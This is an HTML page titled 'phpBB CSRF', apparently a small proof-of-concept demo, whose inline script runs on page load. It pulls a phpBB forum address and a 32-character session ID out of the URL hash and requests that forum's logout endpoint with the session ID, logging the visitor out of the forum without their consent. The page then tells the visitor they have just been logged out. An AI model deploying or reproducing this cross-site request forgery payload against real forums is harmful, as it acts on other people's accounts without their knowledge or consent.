<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
  <head>
    <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
    <META HTTP-EQUIV="Expires" CONTENT="-1">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>phpBB CSRF</title>
    <script type="text/javascript" src="scripts/analytics.js"></script>
    <link rel="stylesheet" href="../globalheader.css" type="text/css">
    <style type="text/css">
      body {
        margin: 0px;
        padding: 0px;
        background-image: url("background.png");
        font-family: Georgia;
      }

      #title {
        width: 520px;
        margin-left: auto;
        margin-right: auto;
        color: #0090B0;
        font-size: 70px;
        text-shadow: 3px 3px 3px #444444;
      }

      #subtitle {
        width: 520px;
        margin-left: auto;
        margin-right: auto;
        text-align: left;
        color: #111111;
        font-size: 30px;
      }

      #box {
        width: 600px;
        margin-top: 100px;
        margin-left: auto;
        margin-right: auto;
        background-color: #E7D9C0;
        border: 1px solid #111111;
      }

      a, a:link, a:visited {
        color: #111111;
        text-decoration: underline;
      }

      a:hover {
        color: #0090B0;
      }
    </style>
  </head>
  <body>
    <script type="text/javascript">
      var string = document.location.hash;
      var pattern = /(https?:\/\/([a-z]+\.?)+).+&sid=([0-9a-zA-Z]{32})/;
      var match = pattern.exec(string);
      foo = new Image();
      foo.src = match[1]+'/ucp.php?mode=logout&sid='+match[(match.length-1)];
    </script>
    <div id="globalheader"><a href="http://grickit.github.com">&nbsp;&lt; Back to grickit.github.com</a> <a href="http://github.com/grickit/GambCiv">&nbsp;&lt; Source code</a></div>
    <div id="box">
      <p id="title">phpBB CSRF</p>
      <p id="subtitle">You've just been logged out of some phpBB forum out there.</a></p>
    </div>
  </body>
</html>